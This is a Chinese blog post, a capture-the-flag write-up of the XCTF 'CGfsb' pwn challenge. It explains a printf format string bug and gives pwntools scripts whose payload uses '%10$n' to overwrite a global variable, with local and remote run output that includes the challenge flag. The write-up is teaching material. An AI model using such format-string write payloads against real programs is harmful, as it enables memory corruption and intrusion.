CGfsb [XCTF-PWN]CTF writeup系列2

最新推荐文章于 2020-12-27 21:59:54 发布
最新推荐文章于 2020-12-27 21:59:54 发布
阅读量560 收藏
点赞数 1
分类专栏: XCTF-PWN CTF 文章标签: xctf ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103618324
版权
CTF 同时被 2 个专栏收录
46 篇文章 4 订阅
订阅专栏
XCTF-PWN
28 篇文章 10 订阅
订阅专栏

题目地址:CGfsb

先下载题目看看情况

 中间步骤我就不再赘述了,直接就上来分析反编译的情况,先例行检查一下保护情况

checksec 5982010c172744c8a1c93c24b5200b21 
[*] '/ctf/work/python/5982010c172744c8a1c93c24b5200b21'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

反编译成c语言代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int buf; // [esp+1Eh] [ebp-7Eh]
  int v5; // [esp+22h] [ebp-7Ah]
  __int16 v6; // [esp+26h] [ebp-76h]
  char s; // [esp+28h] [ebp-74h]
  unsigned int v8; // [esp+8Ch] [ebp-10h]

  v8 = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  buf = 0;
  v5 = 0;
  v6 = 0;
  memset(&s, 0, 0x64u);
  puts("please tell me your name:");
  read(0, &buf, 0xAu);
  puts("leave your message please:");
  fgets(&s, 100, stdin);
  printf("hello %s", &buf);
  puts("your message is:");
  printf(&s);
  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }
  else
  {
    puts("Thank you!");
  }
  return 0;
}

这里面可以注意到printf(&s);只有一个参数,正常来说printf是至少需要二个以上到参数的。

那么考点就是在这里了,注意到题目到文字部分

“菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用”

printf格式化漏洞的具体情况,大家可以去搜索一下,资料非常多,我这里就直接利用这个漏洞,把过程给大家讲一下

我先把最重要的payload部分分解一下,首先我们需要确认一下偏移位置,确定偏移位置的payload如下:

payload = 'A'*4 + '%x,'*10 + '%x'

我们在payload的前四个字节设置位AAAA,那么我们就需要在printf打印出来的字节中找到41414141这样的字符,因为ASCII码的A=41。

我先给出查找偏移位置的python脚本

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *

p = process('./5982010c172744c8a1c93c24b5200b21')
# p = remote("111.198.29.45", 59952)

payload = 'A'*4 + '%x,'*10 + '%x'

p.sendlineafter('name:', 'aaa')
p.sendlineafter('please:', payload)
p.interactive()

执行之后的结果如下:

这里通过计算我们发现41414141是处在第10个位置 

我们回顾一下之前的题目的反编译c语言代码,需要获得flag的内容,我们要搞定的条件是:

  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }

 pwnme跟进去看到它是bss段中的一个数据地址

.bss:0804A068 pwnme           dd ?                    ; DATA XREF: main+105↑r

现在三个条件都有了,我们重新来构造一下payload

payload = p32(0x0804A068) + 'A'*4 + '%10$n'

这里解释一下%n是写入计数值,%10$n的意思是讲计数值写入第10个参数,也就是我们之前定位的偏移值

p32(0x0804A068) + 'A'*4 计算是8个字符,也就是把8写入到0x0804A068所在地址,也就相当于给变量pwnme赋值为8

那我就继续构造一下本地执行的python脚本

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *

p = process('./5982010c172744c8a1c93c24b5200b21')
# p = remote("111.198.29.45", 59952)

# payload = 'A'*4 + '%x,'*10 + '%x'
payload = p32(0x0804A068) + 'A'*4 + '%10$n'


p.sendlineafter('name:', 'aaa')
p.sendlineafter('please:', payload)
p.interactive()

执行结果如下:

root@mypwn:/ctf/work/python# python CGfsb.py 
[+] Starting local process './5982010c172744c8a1c93c24b5200b21': pid 69
[*] Switching to interactive mode

hello aaa
your message is:
h\xa0\x0AAAA
you pwned me, here is your flag:

cat: flag: No such file or directory
[*] Process './5982010c172744c8a1c93c24b5200b21' stopped with exit code 0 (pid 69)
[*] Got EOF while reading in interactive

注意看到了“you pwned me, here is your flag:”,因为本地没有flag文件,所以没有实际的flag值输出。

实际的执行已经是成功的,那么我们修改一下为远程执行,python代码就不再贴出来了,自行脑补,执行结果如下:

root@mypwn:/ctf/work/python# python CGfsb.py 
[+] Opening connection to 111.198.29.45 on port 59952: Done
[*] Switching to interactive mode

hello aaa
your message is:
h\xa0\x0AAAA
you pwned me, here is your flag:

cyberpeace{3f45d72f69056de04a6cf274a132a374}
[*] Got EOF while reading in interactive
$

这就执行完成了,本题主要是要理解printf的单参数漏洞及%n计数写入指定参数位置,这两个知识点。

3riC5r
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CGfsb(xctf)
weixin_43868725的博客
05-06 652
0x0 程序保护和流程 保护: 流程: main() 可以明显的发现存在一个格式化字符串漏洞,然后当pwnme这个变量等于8时调用’cat flag’这个命令。又因为程序没有开启pie并且pwnme是全局变量,所以可以通过格式化字符串漏洞将pwnme这个变量改为8从而得到flag。 0x1 利用过程 首先先确定偏移量 可以发现偏移量是10,然后查看pwnme变量的地址 将pwnme的值改为...
xctf - cgfsb
just do IT
07-09 1407
查看程序保护 用IDA 打开 查看24行代码可知,通过修改全局变量pwnme = 8 则结束。 使用gdb 动态调试。 漏洞代码; pwnme 地址, exp: from pwn import * sh = remote('111.198.29.45',36640) sh.recv() sh.sendline('hacker') sh.recv() payload = p32(0x804a...
XCTF 攻防世界 pwn CGfsb
热门推荐
stareforever的博客
12-22 2万+
XCTF 攻防世界 pwn CGfsb 题目流程 printf(&s) 明显的format string 漏洞 修改pwnme的值为8 完整的ex
day-4 xctf-pwn CGfsb
a525024162806525的博客
09-24 99
xctf-pwn CGfsb 传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 (菜鸡面对着pringf发愁)(-_-||)菜鸡了解的printf知识传送门: https://blog.csdn.net/u010517901/article/detail...
XCTF-攻防世界 CGfsb 格式化字符串漏洞
river
07-02 4116
攻防世界-CGfsb-格式化字符串漏洞 参考自 http://geekfz.cn/index.php/2019/06/12/pwn-format/ 程序拿下来丢到IDA F5 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; ...
【XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
【XCTF-RE】新手练习区-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
【XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
一天一道ctf之攻防世界-CGfsb
qq_42728977的博客
08-29 353
暑假笼统地学了Pwn,听的迷迷糊糊的,现在拾起来从头学。开始做题了,拿到程序扔进IDA。 int __cdecl main(int argc, const char **argv, const char **envp) { int buf; // [esp+1Eh] [ebp-7Eh] int v5; // [esp+22h] [ebp-7Ah] __int16 v6; // [esp...
攻防世界pwn—CGFsb
nzw1134864657的博客
07-27 298
先看一下文件是32位的,再查看一下程序的保护机制 发现栈的保护开启,程序会在栈里放入一个canary,返回时检测canary是否发生变化 我们先运行一下程序看一下逻辑 在IDA中打开查看伪代码,发现如果pwnme=8,就可以到得到flag 此处要利用格式化字符串漏洞,使用%n格式修改任意地址内容,把前面已经打印的长度写入某个内存地址中去。 在这里设置断点 查看一下pwnme的地址 在wr...
攻防世界-pwn CGfsb (格式化字符串)
菜的只能随便写写博客
08-05 1570
0x01 拿到题目之后首先分析文件 得到信息: 32bit ELF可执行文件 未开启PIE(即静态反汇编得地址可以直接使用) 0x02 执行文件 执行文件之后发现程序接收两个输入并将其原样输出   0x03 利用IDA反汇编 发现flag,需要将pwnme的值改为8才能拿到flag 通过查找发现pwnme在bss段,并且在程序之中用到了printf,可以考虑用格式化串漏洞将...
攻防世界 新手区CGfsb
qq_25044201的博客
12-27 126
老办法看一下开启了哪些保护 然后放在ida静态分析一下 大体意思是全局变量pwnme=8时会获得flag 但是pwnme这个变量我们无法控制,怎么办呢? 其中有个关键的 这里如果我们输入%x 它会输出什么? 我输入了aaaa 以及12个%x linux系统会按栈的顺序一一输出内容 而aaaa 泄露在第11个参数 所以我们先泄露这个pwnme全局变量的位置 然后通过%$n修改这地址的值 所以完成 ...
攻防世界_pwn_CGfsb(萌新版)-pwnme解惑
TedLau的博客
02-24 517
首发于鄙人博客:传送门 0x00 前言 格式化字符串漏洞。 file checksec结果如下所示: NX打开,就是说堆栈不可执行。 PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。 0x10 步骤 0x11 main函数 在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统...
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 811
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
CGfsb--writeup
ATFWUS的博客
03-03 470
文件下载地址: 链接:https://pan.baidu.com/s/1a9zj-OQAOgTw7KooZPBBaQ 提取码:y9wi 0x01.分析 checksec: 32位程序,没有开启ASLR。 查看源码: 利用漏洞: 在查看源码的时候,很明显的发现23行存在格式化字符串漏洞,后面如果pwnme等于8,那么就可以直接得到flag,所以我们要利用格式化字符串漏洞修改p...
攻防世界 pwn cgfsb writeup
PLpa的博客
07-06 1871
攻防世界pwn——cgfsb 这一题是关于格式化字符串漏洞的题,是一个单一漏洞题,不需要太多的绕过。 拿到题目首先查看一下保护: 可以看到,这是一个32位的程序。 并且开启了Canary保护和NX保护。 我们看一下IDA: 进入IDA,按下F5可以得到伪C代码: 可以看到有一个格式化漏洞printf(&s),我们可以通过这条语句把pwnme的值改为8,就可以的到flag了。 打开gdb...
2019中原工pwn题
Jc
05-07 400
checksec机制和file信息 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ./pwn: ELF 64-bit LSB shared object, x86-64, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值